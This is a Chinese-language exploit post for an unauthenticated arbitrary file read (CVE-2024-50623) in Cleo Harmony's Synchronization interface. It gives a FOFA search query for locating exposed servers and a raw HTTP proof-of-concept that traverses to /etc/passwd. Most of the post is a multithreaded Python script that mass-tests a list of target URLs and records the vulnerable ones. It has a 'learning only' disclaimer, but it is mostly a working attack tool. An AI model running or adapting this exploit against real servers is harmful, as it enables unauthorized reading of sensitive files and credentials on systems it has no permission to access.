Cleo Harmony接口Synchronization存在任意文件读取漏洞
Cleo Harmony的Synchronization接口存在任意文件读取漏洞,未经身份验证的攻击者可以通过漏洞读取服务器任意文件,从而获取大量敏感信息。
fofa
body="packages/partnerlogos/userportal_logo"POC
GET /Synchronization HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: csrftoken=z1GtnjQWsIKwGazlFX7V; csrftoken=NX6iujIUcamW9umprA1vx19dzU6EZNLa; csrftoken=kZ4jVQ4uZtITYtnweSsVDUEwZ2ltraTF
Priority: u=4
Retrieve: l=Ab1234-RQ0258;n=VLTrader;v=7.2.1;a=1337;po=1337;s=True;b=False;pp=1337;path=../../etc/passwdpython利用脚本
# _*_ coding : utf-8 _*_
# @Time : 2025-03-14 9:20
# Author : 长安风生
# File : Cleo_read
# Project : pythonProject
import requests
import sys
from concurrent.futures import ThreadPoolExecutor, as_completed
from urllib3.exceptions import InsecureRequestWarning
# 禁止显示与不安全请求相关的警告
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
#检测前描述
def print_logo():
logo = """
.__ _____ .__
____ | |__ _____ ____ _________ ____ _/ ____\____ ____ ____ _____| |__ ____ ____ ____
_/ ___\| | \\__ \ / \ / ___\__ \ / \ \ __\/ __ \ / \ / ___\/ ___/ | \_/ __ \ / \ / ___\
\ \___| Y \/ __ \| | \/ /_/ > __ \| | \ | | \ ___/| | \/ /_/ >___ \| Y \ ___/| | \/ /_/ >
\___ >___| (____ /___| /\___ (____ /___| / |__| \___ >___| /\___ /____ >___| /\___ >___| /\___ /
\/ \/ \/ \//_____/ \/ \/ \/ \//_____/ \/ \/ \/ \//_____/
"""
print(logo)
def print_usage():
print("使用帮助:")
print(" 1.创建Cleo_read_check.txt把要检测的url放入Cleo_read_check.txt")
print(" 2.把Cleo_read_check.txt和Cleo_read.py放在同一文件夹下")
print(" 3.python Cleo_read.py")
print()
print("结果说明:")
print(" 成功检测出的url会保存到Cleo_read.txt")
print()
def start_message():
print("本程序仅供学习使用,如若非法他用,与本文作者无关,需自行负责!")
print("程序功能:多线测检测Cleo文件传输软件任意文件读取漏洞(CVE-2024-50623) By:长安风生&棉花糖网络安全")
print("-" * 88) # 打印分割线
def print_red(text):
# ANSI转义序列设置为红色,让存在的漏洞的变成红色醒目
red_start = "\033[91m"
red_end = "\033[0m"
print(red_start + text + red_end)
def check_vulnerability(target_url):
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
'Accept-Language': 'zh-CN,zh;q=0.9',
'Vlsync': ('Retrieve;l=Ab1234-RQ0258;n=VLTrader;v=7.2.1;a=1337;po=1337;'
's=True;b=False;pp=1337;path=../../etc/passwd'),
'Accept-Encoding': 'gzip, deflate, br'
}
try:
response = requests.get(target_url, headers=headers, timeout=10, verify=False)
if "root:x:" in response.text:
# print(response.text)
print_red(f"[+] The target {target_url} is potentially vulnerable to arbitrary file read.")
return target_url
else:
print(f"[-] The target {target_url} does not appear to be vulnerable to arbitrary file read.")
except requests.RequestException as e:
print(f"[!] Failed to connect to {target_url}: {e}")
return None
def process_url(line):
base_url = line.strip()
target_url = base_url + '/Synchronization'
return check_vulnerability(target_url)
if __name__ == "__main__":
print_logo()
print_usage()
start_message()
# 询问是否想要执行检测
execute_check = input("您希望现在执行漏洞检测吗?(yes/no): ").strip().lower()
if execute_check not in ["yes", "y"]:
print("执行已取消!")
sys.exit(0)
vulnerable_urls = [] # 用于存储检查成功的URL
with open('Cleo_read_check.txt', 'r') as file:
urls = [line.strip() for line in file]
with ThreadPoolExecutor(max_workers=10) as executor:
# 使用future对象来获取线程执行的结果
future_to_url = {executor.submit(process_url, url): url for url in urls}
for future in as_completed(future_to_url):
result = future.result()
if result:
vulnerable_urls.append(result)
# 执行结束后,将所有检测成功的URL写入Cleo_read.txt
with open('Cleo_read.txt', 'w') as file:
for url in vulnerable_urls:
file.write(url + '\n')© 版权声明
文章版权归作者所有,转载请标明出处。
THE END
暂无评论内容